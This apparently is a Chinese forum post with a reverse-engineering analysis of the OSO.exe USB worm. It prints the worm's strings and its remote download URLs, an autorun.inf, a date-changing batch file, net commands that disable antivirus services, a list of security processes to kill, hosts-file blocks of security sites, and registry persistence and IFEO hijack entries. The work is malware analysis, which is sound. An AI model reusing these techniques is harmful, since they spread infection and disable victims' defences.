0040A3F8 push OSO.0040A4D5 ASCII "drivers\"
0040A3FF push OSO.0040A469 ASCII ".exe"
0040A422 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A427 mov edx,OSO.0040AF2D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe"
0040B02F mov eax,OSO.0040B225 ASCII "A}cNqqc{[TWQkgdfv7(3"
0040B04E mov eax,OSO.0040B245 ASCII "@ijNqqc{[TWQkgdfv7(3"
0040B06A push OSO.0040B25D ASCII "AntiTrojan3721"
0040B078 push OSO.0040B26D ASCII "ASSISTSHELLMUTEX"
0040B086 push OSO.0040B281 ASCII "SKYNET_PERSONAL_FIREWALL"
0040B094 push OSO.0040B29D ASCII "KingsoftAntivirusScanProgram7Mutex"
0040B0BC mov edx,OSO.0040B2C9 ASCII "glqq"
0040B0DF mov edx,OSO.0040B2C9 ASCII "glqq"
0040B10B push OSO.0040B2D9 ASCII ".exe"
0040B13F push OSO.0040B2E9 ASCII ".dll"
0040B16C mov edx,OSO.0040B2F9 ASCII "severe.exe"
0040B191 push OSO.0040B30D ASCII "drivers\"
0040B196 push OSO.0040B321 ASCII "conime.exe"
0040B1C3 push OSO.0040B30D ASCII "drivers\"
0040B1CF push OSO.0040B2D9 ASCII ".exe"
0040B35B mov eax,OSO.0040B3AD ASCII "r`t`hvog*agw"
0040B3EF mov eax,OSO.0040B4F9 ASCII "r`t`hvog*agw"
0040B461 mov eax,OSO.0040B4F9 ASCII "r`t`hvog*agw"
0040B4AA mov eax,OSO.0040B4F9 ASCII "r`t`hvog*agw"
0040B532 mov edx,OSO.0040B6E5 ASCII "kakatool.dll"
0040B55E mov eax,OSO.0040B6FD ASCII "D&" *mrn"
0040B58F mov edx,OSO.0040B711 ASCII "glqq"
0040B5B6 mov eax,OSO.0040B721 ASCII "`tn{5+r{p"
0040B5E6 mov eax,OSO.0040B735 ASCII "`tn{6+r{p"
0040B616 mov eax,OSO.0040B749 ASCII "`tn{7+r{p"
0040B646 mov eax,OSO.0040B6FD ASCII "D&" *mrn"
0040B672 mov edx,OSO.0040B711 ASCII "glqq"
0040B68D mov eax,OSO.0040B75D ASCII "JQbkgu(f|`"
0040B6A2 mov eax,OSO.0040B771 ASCII "WSEKK]R-A]C"
0040B7D9 push OSO.0040B879 ASCII "drivers\"
0040B7DE push OSO.0040B88D ASCII "conime.exe"
0040B81C push OSO.0040B879 ASCII "drivers\"
0040B821 push OSO.0040B88D ASCII "conime.exe"
0040B83C push OSO.0040B899 ASCII "open"
0040B8C6 push OSO.0040B935 ASCII "drivers\"
0040B8CB push OSO.0040B949 ASCII "conime.exe"
0040B9B8 push OSO.0040BA55 ASCII ".exe"
0040B9FD push OSO.0040BA55 ASCII ".exe"
0040BA18 push OSO.0040BA5D ASCII "open"
0040BABF mov edx,OSO.0040BB45 ASCII "severe.exe"
0040BAF5 mov edx,OSO.0040BB45 ASCII "severe.exe"
0040BB08 push OSO.0040BB51 ASCII "open"
0040BB82 push OSO.0040BC29 ASCII ".exe"
0040BBCD mov edx,OSO.0040BC39 ASCII "severe.exe"
0040BCA1 push OSO.0040BD41 ASCII "drivers\"
0040BCA6 push OSO.0040BD55 ASCII "conime.exe"
0040BCE4 push OSO.0040BD41 ASCII "drivers\"
0040BCE9 push OSO.0040BD55 ASCII "conime.exe"
0040BD04 push OSO.0040BD61 ASCII "open"
0040BD89 push OSO.0040BE15 ASCII "drivers\"
0040BD8E push OSO.0040BE29 ASCII "conime.exe"
0040BDD5 mov edx,OSO.0040BE3D ASCII "yes"
0040C0D2 mov eax,OSO.0040C175 ASCII "HXQ"
0040C0FD mov edx,OSO.0040C175 ASCII "HXQ"
0040C231 push ebp (初始 CPU 选择)
0040C2A6 mov eax,OSO.0040CDDD ASCII "d:\OSO.exe"
0040C2BF push OSO.0040CDE9 ASCII "d:\"
0040C2C4 push OSO.0040CDED ASCII "Explorer.exe"
0040C2C9 push OSO.0040CDFD ASCII "open"
0040C2E6 mov eax,OSO.0040CE0D ASCII "e:\OSO.exe"
0040C2FF push OSO.0040CE19 ASCII "e:\"
0040C304 push OSO.0040CDED ASCII "Explorer.exe"
0040C309 push OSO.0040CDFD ASCII "open"
0040C326 mov eax,OSO.0040CE25 ASCII "f:\OSO.exe"
0040C33F push OSO.0040CE31 ASCII "f:\"
0040C344 push OSO.0040CDED ASCII "Explorer.exe"
0040C349 push OSO.0040CDFD ASCII "open"
0040C366 mov eax,OSO.0040CE3D ASCII "g:\OSO.exe"
0040C37F push OSO.0040CE49 ASCII "g:\"
0040C384 push OSO.0040CDED ASCII "Explorer.exe"
0040C389 push OSO.0040CDFD ASCII "open"
0040C3A6 mov eax,OSO.0040CE55 ASCII "h:\OSO.exe"
0040C3BF push OSO.0040CE61 ASCII "h:\"
0040C3C4 push OSO.0040CDED ASCII "Explorer.exe"
0040C3C9 push OSO.0040CDFD ASCII "open"
0040C3E6 mov eax,OSO.0040CE6D ASCII "i:\OSO.exe"
0040C3FF push OSO.0040CE79 ASCII "i:\"
0040C404 push OSO.0040CDED ASCII "Explorer.exe"
0040C409 push OSO.0040CDFD ASCII "open"
0040C420 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C446 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C469 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C48E mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C4C0 push OSO.0040CE99 ASCII ".exe"
0040C4F4 push OSO.0040CE99 ASCII ".exe"
0040C521 push OSO.0040CE99 ASCII ".exe"
0040C550 push OSO.0040CE99 ASCII ".exe"
0040C583 push OSO.0040CEA9 ASCII "drivers\"
0040C58F push OSO.0040CE99 ASCII ".exe"
0040C5C1 push OSO.0040CEA9 ASCII "drivers\"
0040C5CD push OSO.0040CE99 ASCII ".exe"
0040C5FE push OSO.0040CEA9 ASCII "drivers\"
0040C60A push OSO.0040CE99 ASCII ".exe"
0040C643 push OSO.0040CEA9 ASCII "drivers\"
0040C64F push OSO.0040CE99 ASCII ".exe"
0040C68E push OSO.0040CEA9 ASCII "drivers\"
0040C693 push OSO.0040CEBD ASCII "conime.exe"
0040C6D1 push OSO.0040CEA9 ASCII "drivers\"
0040C6D6 push OSO.0040CEBD ASCII "conime.exe"
0040C70D push OSO.0040CEA9 ASCII "drivers\"
0040C712 push OSO.0040CEBD ASCII "conime.exe"
0040C74B push OSO.0040CEA9 ASCII "drivers\"
0040C750 push OSO.0040CEBD ASCII "conime.exe"
0040C7A5 push OSO.0040CE99 ASCII ".exe"
0040C802 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C854 push OSO.0040CEA9 ASCII "drivers\"
0040C859 push OSO.0040CEBD ASCII "conime.exe"
0040C8AA push OSO.0040CE99 ASCII ".exe"
0040C8CB push OSO.0040CDFD ASCII "open"
0040C8EE mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C904 push OSO.0040CDFD ASCII "open"
0040C927 push OSO.0040CEA9 ASCII "drivers\"
0040C92C push OSO.0040CEBD ASCII "conime.exe"
0040C94D push OSO.0040CDFD ASCII "open"
0040C9D9 push OSO.0040CE99 ASCII ".exe"
0040CA17 mov eax,OSO.0040CED1 ASCII "U]+2"
0040CA47 mov eax,OSO.0040CED1 ASCII "U]+2"
0040CACE push OSO.0040CEE1 ASCII ".dll"
0040CAF0 mov edx,OSO.0040CEE9 ASCII "dll"
0040CAF5 mov eax,OSO.0040CEED ASCII "dllfile"
0040CB17 push OSO.0040CEE1 ASCII ".dll"
0040CB50 push OSO.0040CEE1 ASCII ".dll"
0040CB78 push OSO.0040CEF5 ASCII "HookOn"
0040CB99 push OSO.0040CEFD ASCII "HookOff"
0040CBD3 push OSO.0040CEA9 ASCII "drivers\"
0040CBD8 push OSO.0040CEBD ASCII "conime.exe"
0040CC16 mov eax,OSO.0040CF0D ASCII "U]+1"
0040CC46 mov eax,OSO.0040CF0D ASCII "U]+1"
0040CCD9 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040CD0C mov eax,OSO.0040CF1D ASCII "U]+0"
0040CD38 mov eax,OSO.0040CF1D ASCII "U]+0"
004134DF mov ebx,OSO.00400000 ASCII "MZ"
0041356A mov edx,OSO.00400000 ASCII "MZ"

这个是U盘感染者,跟我前次分析的一个只是OEP不一样,可能是个变种。

3.释放的病毒:
0012FE54 00CC0238 |NewFileName = "D:\winnt\system32\severe.exe"
0012FE54 00CC0350 |NewFileName = "D:\winnt\system32\.exe" ; 文件名也可能是随机的
0012FE54 00CC0478 |NewFileName = "D:\winnt\system32\drivers\.exe" ; 文件名也可能是随机的
0012FE54 00CC05C0 |NewFileName = "D:\winnt\system32\drivers\conime.exe"

这里.exe的文件名可能是随机的,也可能是因为变种的原因不同.
以下.exe的文件名如果目录位置一样,那么文件名也应该跟这里的一样

4.静态分析:按照字符串顺序
4.1 修改时间:
00404C75 BA A54D4000 mov edx,dumped_.00404DA5 ; ASCII "hx1.bat"
路径:"D:\winnt\system32\hx1.bat"

@echo off
set date=2004-1-22
ping ** localhost > nul
date %date%
del %0

4.2 从网络下载病毒:
004057BF 8D55 FC lea edx,dword ptr ss:[ebp-4]
004057C2 B8 8D594000 mov eax,dumped_.0040598D ; ASCII "lqrs>*)tsr(``642*kcw+66t*q~w"
004057C7 E8 5DF9FFFF call dumped_.00405129
堆栈 ss:[0012FFEC]=00CC0040, (ASCII "http://www.cd321.net/30w.txt")

堆栈 ss:[0012FF8C]=00CC0170, (ASCII "D:\winnt\system32\dqhx1.txt")

0040585A E8 62F0FFFF call <jmp.&urlmon.URLDownloadToFileA>

00405909 B8 C9594000 mov eax,dumped_.004059C9 ; ASCII "A}vokwcq*`~f"
0040590E E8 16F8FFFF call dumped_.00405129 ; 解密后为:explore.exe

0040591F B8 E1594000 mov eax,dumped_.004059E1 ; ASCII "kucm"
00405924 E8 00F8FFFF call dumped_.00405129 ; 解密后为open

00405934 E8 10EFFFFF call <jmp.&shell32.ShellExecuteA>
00405946 E8 1EECFFFF call <jmp.&kernel32.DeleteFileA>
00405958 E8 34EEFFFF call <jmp.&wininet.DeleteUrlCacheEntry>

从这个网站下载病毒列表:ASCII "http://www.cd321.net/30w.txt"
下载到硬盘:D:\winnt\system32\dqhx1.txt
执行后删除文件并删除记录.

另一个下载地址列表为:
00405A11 8D55 FC lea edx,dword ptr ss:[ebp-4]
00405A14 B8 C95D4000 mov eax,dumped_.00405DC9 ; ASCII "lqrs>*)tsr(`ps757+eli*ggilh,`jqm*q~w"
00405A19 E8 0BF7FFFF call dumped_.00405129
堆栈 ss:[0012FF68]=00CC0434, (ASCII "http://www.ctv163.com/admin/down.txt")

下载到:(ASCII "D:\winnt\system32\dqhx3.txt")

4.3 对移动盘植入病毒:
00405E8C 50 push eax ; 压入盘符
00405E8D E8 17E7FFFF call <jmp.&kernel32.GetDriveTypeA>
00405E92 83F8 02 cmp eax,2 ; 是不是u盘?
00405E95 0F85 FF020000 jnz dumped_.0040619A

移动盘如A盘,U盘;2,
硬盘:3

假设E盘为U盘,先删除原有文件:
0012FC08 00CC0158 \FileName = "E:\autorun.inf"
0012FC08 00CC0174 \FileName = "E:oso.exe"
0012FC08 00CC0190 \FileName = "E:\重要资料.exe"
0012FC08 00CC01AC \FileName = "E:\美女游戏.pif"

然后拷贝病毒过去并更名为相应的名称,创建autorun.inf.

[AutoRun]
open=OSO.exe
shellexecute=OSO.exe
shell\Auto\command=OSO.exe

4.4 硬盘植入病毒:
004062FD 50 push eax
004062FE E8 A6E2FFFF call <jmp.&kernel32.GetDriveTypeA>
00406303 83F8 03 cmp eax,3
00406306 0F85 3D020000 jnz dumped_.00406549

那么只写入OSO.exe&autorun.inf.

4.5 创建网页,写入不安全网址:
先判断是否连接上网:
00407784 E8 10D0FFFF call <jmp.&wininet.InternetGetConnectedState>

创建网页写入网址:
004077A0 B8 AD7A4000 mov eax,dumped_.00407AAD ; ASCII "D&" *mrn"
004077A5 E8 7FD9FFFF call dumped_.00405129 ; 网页名称
堆栈 ss:[0012FE6C]=00CC0464, (ASCII "@#$#.htm")

路径:堆栈 ss:[0012FE70]=00CC0410, (ASCII "D:\winnt\system32\@#$#.htm")
内容:<FRAMESET> <FRAME src="http://www.ctv163.com"> </FRAMESET>

中间<FRAME src="http://www.ctv163.com">的内容可变,总共有这么几个:
0040781C mov eax,OSO.00407AC1 ASCII "lqrs>*)tsr(``642*fin"
00407835 mov eax,OSO.00407AE1 ASCII "lqrs>*)tsr(``642*kcw"
0040784E mov eax,OSO.00407B01 ASCII "lqrs>*)tsr(532?43+eli"
00407867 mov eax,OSO.00407B21 ASCII "lqrs>*)tsr(`ps757+eli"
解密后分别是:
堆栈 ss:[0012FE74]=00CC0730, (ASCII "http://www.cd321.com")
堆栈 ss:[0012FE74]=00CC0774, (ASCII "http://www.cd321.net")
堆栈 ss:[0012FE74]=00CC07B8, (ASCII "http://www.677977.com")
堆栈 ss:[0012FE74]=00CC07FC, (ASCII "http://www.ctv163.com")

然后执行:
00407A64 E8 E0CDFFFF call <jmp.&shell32.ShellExecuteA>

4.6 关闭服务,包括杀软:
004082F2 6A 00 push 0
004082F4 6A 00 push 0
004082F6 68 E5864000 push dumped_.004086E5 ; ASCII "stop srservice"
004082FB 68 F5864000 push dumped_.004086F5 ; ASCII "net.exe"
00408300 68 FD864000 push dumped_.004086FD ; ASCII "open"
00408305 6A 00 push 0
00408307 E8 3DC5FFFF call <jmp.&shell32.ShellExecuteA>

有这些:
004082F6 push OSO.004086E5 ASCII "stop srservice"
00408310 push OSO.00408705 ASCII "config srservice start= disabled"
0040832A push OSO.00408731 ASCII "stop sharedaccess"
00408344 push OSO.00408745 ASCII "stop KVWSC"
0040835E push OSO.00408751 ASCII "config KVWSC start= disabled"
00408378 push OSO.00408771 ASCII "stop KVSrvXP"
00408392 push OSO.00408781 ASCII "config KVSrvXP start= disabled"
004083AC push OSO.004087A1 ASCII "stop kavsvc"
004083C6 push OSO.004087AD ASCII "config kavsvc start= disabled"
004083E0 push OSO.004087CD ASCII "config RsRavMon start= disabled"
004083FA push OSO.004087ED ASCII "stop RsCCenter"
00408414 push OSO.004087FD ASCII "config RsCCenter start= disabled"
0040842E push OSO.00408821 ASCII "stop RsRavMon"

并且关闭瑞星提示:
0040844E 68 31884000 push dumped_.00408831 ; 瑞星提示
00408453 68 3D884000 push dumped_.0040883D ; ASCII "#32770"
00408458 E8 FCC1FFFF call <jmp.&user32.FindWindowA>
0040845D 68 45884000 push dumped_.00408845 ; 是(&Y)..
00408462 68 4D884000 push dumped_.0040884D ; ASCII "Button"
00408467 6A 00 push 0
00408469 50 push eax
0040846A E8 F2C1FFFF call <jmp.&user32.FindWindowExA>

4.7 结束进程,包括杀软:
00408482 B8 5D884000 mov eax,dumped_.0040885D ; ASCII "sc.exe"
00408487 E8 1DCAFFFF call dumped_.00404EA9

00404FD3 E8 51F6FFFF call <jmp.&kernel32.TerminateProcess>

包括:
00408482 mov eax,OSO.0040885D ASCII "sc.exe"
0040848C mov eax,OSO.0040886D ASCII "cmd.exe"
00408496 mov eax,OSO.0040887D ASCII "net.exe"
004084A0 mov eax,OSO.0040888D ASCII "sc1.exe"
004084AA mov eax,OSO.0040889D ASCII "net1.exe"
004084B4 mov eax,OSO.004088B1 ASCII "PFW.exe"
004084BE mov eax,OSO.004088C1 ASCII "Kav.exe"
004084C8 mov eax,OSO.004088D1 ASCII "KVOL.exe"
004084D2 mov eax,OSO.004088E5 ASCII "KVFW.exe"
004084DC mov eax,OSO.004088F9 ASCII "adam.exe"
004084E6 mov eax,OSO.0040890D ASCII "qqav.exe"
004084F0 mov eax,OSO.00408921 ASCII "qqkav.exe"
004084FA mov eax,OSO.00408935 ASCII "TBMon.exe"
00408504 mov eax,OSO.00408949 ASCII "kav32.exe"
0040850E mov eax,OSO.0040895D ASCII "kvwsc.exe"
00408518 mov eax,OSO.00408971 ASCII "CCAPP.exe"
00408522 mov eax,OSO.00408985 ASCII "KRegEx.exe"
0040852C mov eax,OSO.00408999 ASCII "kavsvc.exe"
00408536 mov eax,OSO.004089AD ASCII "VPTray.exe"
00408540 mov eax,OSO.004089C1 ASCII "RAVMON.exe"
0040854A mov eax,OSO.004089D5 ASCII "EGHOST.exe"
00408554 mov eax,OSO.004089E9 ASCII "KavPFW.exe"
0040855E mov eax,OSO.004089FD ASCII "SHSTAT.exe"
00408568 mov eax,OSO.00408A11 ASCII "RavTask.exe"
00408572 mov eax,OSO.00408A25 ASCII "TrojDie.kxp"
0040857C mov eax,OSO.00408A39 ASCII "Iparmor.exe"
00408586 mov eax,OSO.00408A4D ASCII "MAILMON.exe"
00408590 mov eax,OSO.00408A61 ASCII "MCAGENT.exe"
0040859A mov eax,OSO.00408A75 ASCII "KAVPLUS.exe"
004085A4 mov eax,OSO.00408A89 ASCII "RavMonD.exe"
004085AE mov eax,OSO.00408A9D ASCII "Rtvscan.exe"
004085B8 mov eax,OSO.00408AB1 ASCII "Nvsvc32.exe"
004085C2 mov eax,OSO.00408AC5 ASCII "KVMonXP.exe"
004085CC mov eax,OSO.00408AD9 ASCII "Kvsrvxp.exe"
004085D6 mov eax,OSO.00408AED ASCII "CCenter.exe"
004085E0 mov eax,OSO.00408B01 ASCII "KpopMon.exe"
004085EA mov eax,OSO.00408B15 ASCII "RfwMain.exe"
004085F4 mov eax,OSO.00408B29 ASCII "KWATCHUI.exe"
004085FE mov eax,OSO.00408B41 ASCII "MCVSESCN.exe"
00408608 mov eax,OSO.00408B59 ASCII "MSKAGENT.exe"
00408612 mov eax,OSO.00408B71 ASCII "kvolself.exe"
0040861C mov eax,OSO.00408B89 ASCII "KVCenter.kxp"
00408626 mov eax,OSO.00408BA1 ASCII "kavstart.exe"
00408630 mov eax,OSO.00408BB9 ASCII "RAVTIMER.exe"
0040863A mov eax,OSO.00408BD1 ASCII "RRfwMain.exe"
00408644 mov eax,OSO.00408BE9 ASCII "FireTray.exe"
0040864E mov eax,OSO.00408C01 ASCII "UpdaterUI.exe"
00408658 mov eax,OSO.00408C19 ASCII "KVSrvXp_1.exe"
00408662 mov eax,OSO.00408C31 ASCII "RavService.exe"

4.8 修改hosts使无法访问某些安全网站:
添加的网站有:
00408D45 mov edx,OSO.00409115 ASCII "127.0.0.1 mmsk.cn"
00408D5B mov edx,OSO.0040912D ASCII "127.0.0.1 ikaka.com"
00408D71 mov edx,OSO.00409149 ASCII "127.0.0.1 safe.qq.com"
00408D87 mov edx,OSO.00409165 ASCII "127.0.0.1 360safe.com"
00408D9D mov edx,OSO.00409181 ASCII "127.0.0.1 [url=http://www.mmsk.cn]www.mmsk.cn[/url]"
00408DB3 mov edx,OSO.0040919D ASCII "127.0.0.1 [url=http://www.ikaka.com]www.ikaka.com[/url]"

00408DC9 mov edx,OSO.004091BD ASCII "127.0.0.1 tool.ikaka.com"
00408DDF mov edx,OSO.004091DD ASCII "127.0.0.1 [url=http://www.360safe.com]www.360safe.com[/url]"
00408DF5 mov edx,OSO.004091FD ASCII "127.0.0.1 zs.kingsoft.com"
00408E0B mov edx,OSO.0040921D ASCII "127.0.0.1 forum.ikaka.com"
00408E21 mov edx,OSO.0040923D ASCII "127.0.0.1 up.rising.com.cn"
00408E37 mov edx,OSO.00409261 ASCII "127.0.0.1 scan.kingsoft.com"
00408E4D mov edx,OSO.00409285 ASCII "127.0.0.1 kvup.jiangmin.com"
00408E63 mov edx,OSO.004092A9 ASCII "127.0.0.1 reg.rising.com.cn"
00408E79 mov edx,OSO.004092CD ASCII "127.0.0.1 update.rising.com.cn"
00408E8F mov edx,OSO.004092F5 ASCII "127.0.0.1 update7.jiangmin.com"
00408EA5 mov edx,OSO.0040931D ASCII "127.0.0.1 download.rising.com.cn"
00408EBB mov edx,OSO.00409345 ASCII "127.0.0.1 dnl-us1.kaspersky-labs.com"
00408ED1 mov edx,OSO.00409371 ASCII "127.0.0.1 dnl-us2.kaspersky-labs.com"
00408EE7 mov edx,OSO.0040939D ASCII "127.0.0.1 dnl-us3.kaspersky-labs.com"
00408EFD mov edx,OSO.004093C9 ASCII "127.0.0.1 dnl-us4.kaspersky-labs.com"
00408F13 mov edx,OSO.004093F5 ASCII "127.0.0.1 dnl-us5.kaspersky-labs.com"
00408F29 mov edx,OSO.00409421 ASCII "127.0.0.1 dnl-us6.kaspersky-labs.com"
00408F3F mov edx,OSO.0040944D ASCII "127.0.0.1 dnl-us7.kaspersky-labs.com"
00408F55 mov edx,OSO.00409479 ASCII "127.0.0.1 dnl-us8.kaspersky-labs.com"
00408F6B mov edx,OSO.004094A5 ASCII "127.0.0.1 dnl-us9.kaspersky-labs.com"
00408F81 mov edx,OSO.004094D1 ASCII "127.0.0.1 dnl-us10.kaspersky-labs.com"
00408F97 mov edx,OSO.004094FD ASCII "127.0.0.1 dnl-eu1.kaspersky-labs.com"
00408FAD mov edx,OSO.00409529 ASCII "127.0.0.1 dnl-eu2.kaspersky-labs.com"
00408FC3 mov edx,OSO.00409555 ASCII "127.0.0.1 dnl-eu3.kaspersky-labs.com"
00408FD9 mov edx,OSO.00409581 ASCII "127.0.0.1 dnl-eu4.kaspersky-labs.com"
00408FEF mov edx,OSO.004095AD ASCII "127.0.0.1 dnl-eu5.kaspersky-labs.com"
00409005 mov edx,OSO.004095D9 ASCII "127.0.0.1 dnl-eu6.kaspersky-labs.com"
0040901B mov edx,OSO.00409605 ASCII "127.0.0.1 dnl-eu7.kaspersky-labs.com"
00409031 mov edx,OSO.00409631 ASCII "127.0.0.1 dnl-eu8.kaspersky-labs.com"
00409047 mov edx,OSO.0040965D ASCII "127.0.0.1 dnl-eu9.kaspersky-labs.com"
0040905D mov edx,OSO.00409689 ASCII "127.0.0.1 dnl-eu10.kaspersky-labs.com"

4.9 改变驱动器的autorun方式:
堆栈 ss:[0012FC18]=00CC0464, (ASCII "D:\winnt\system32\noruns.reg")

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:b5 ; 默认为91(H)

运行后删除:
004097F4 68 39994000 push dumped_.00409939 ; ASCII "regedit.exe"
004097F9 68 45994000 push dumped_.00409945 ; ASCII "open"
004097FE 6A 00 push 0
00409800 E8 44B0FFFF call <jmp.&shell32.ShellExecuteA>
...
00409837 E8 2DADFFFF call <jmp.&kernel32.DeleteFileA>

4.10 关闭瑞星注册表监控提示:
004099B9 68 999A4000 push dumped_.00409A99 ; 瑞星注册表监控提示
004099BE 68 AD9A4000 push dumped_.00409AAD ; ASCII "#32770"
004099C3 E8 91ACFFFF call <jmp.&user32.FindWindowA>

4.11 设置注册表:
自启动:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Default) SUCCESS "D:\winnt\system32\.exe"
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Default) SUCCESS "D:\winnt\system32\severe.exe"
Shell:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS "Explorer.exe D:\winnt\system32\drivers\conime.exe"
隐藏:
HKLM\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\CheckedValue SUCCESS "0"

以下所有键值替换为:"D:\winnt\system32\drivers\.exe"
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe\Debugger SUCCESS
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe\Debugger

4.12 顺便运行QQ大盗:????????
0040B02F mov eax,OSO.0040B225 ASCII "A}cNqqc{[TWQkgdfv7(3"
0040B04E mov eax,OSO.0040B245 ASCII "@ijNqqc{[TWQkgdfv7(3"
解密后分别为:
堆栈 ss:[00127D28]=00CC2FA0, (ASCII "ExeMutex_QQRobber2.0")
堆栈 ss:[001279E8]=00CC0304, (ASCII "DllMutex_QQRobber2.0")

这段有点不懂,好像有些杀软软件也被创建:还是QQ大盗冒充这些进程???????????
0040B086 68 81B24000 push dumped_.0040B281 ; ASCII "SKYNET_PERSONAL_FIREWALL"
0040B08B 6A FF push -1
0040B08D 6A 00 push 0
0040B08F E8 AD94FFFF call dumped_.00404541
00404557 E8 DDFFFFFF call <jmp.&kernel32.CreateMutexA>

有这些杀软:
0040B06A push dumped_.0040B25D ASCII "AntiTrojan3721"
0040B078 push OSO.0040B26D ASCII "ASSISTSHELLMUTEX"
0040B086 push OSO.0040B281 ASCII "SKYNET_PERSONAL_FIREWALL"
0040B094 push OSO.0040B29D ASCII "KingsoftAntivirusScanProgram7Mutex"

4.13 可能还释放verclsid.dat:
0040B35B mov eax,OSO.0040B3AD ASCII "r`t`hvog*agw"
0012D230 00EE030C |NewFileName = "D:\winnt\system32\verclsid.dat"

4.14 删除卡卡助手:
0040B532 mov edx,OSO.0040B6E5 ASCII "kakatool.dll"
0040B545 E8 1F90FFFF call <jmp.&kernel32.DeleteFileA>

4.15 如果病毒在d,e,f,g,h,i的根目录下,那么直接运行:
0040C2A6 B8 DDCD4000 mov eax,OSO.0040CDDD ; ASCII "d:\OSO.exe"
0040C2E6 B8 0DCE4000 mov eax,OSO.0040CE0D ; ASCII "e:\OSO.exe"
0040C326 B8 25CE4000 mov eax,OSO.0040CE25 ; ASCII "f:\OSO.exe"
0040C366 B8 3DCE4000 mov eax,OSO.0040CE3D ; ASCII "g:\OSO.exe"
0040C3A6 B8 55CE4000 mov eax,OSO.0040CE55 ; ASCII "h:\OSO.exe"
0040C3E6 B8 6DCE4000 mov eax,OSO.0040CE6D ; ASCII "i:\OSO.exe"

0040C3FF 68 79CE4000 push dumped_.0040CE79 ; ASCII "i:\"
0040C404 68 EDCD4000 push dumped_.0040CDED ; ASCII "Explorer.exe"
0040C409 68 FDCD4000 push dumped_.0040CDFD ; ASCII "open"
0040C40E 6A 00 push 0
0040C410 E8 3484FFFF call <jmp.&shell32.ShellExecuteA>

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.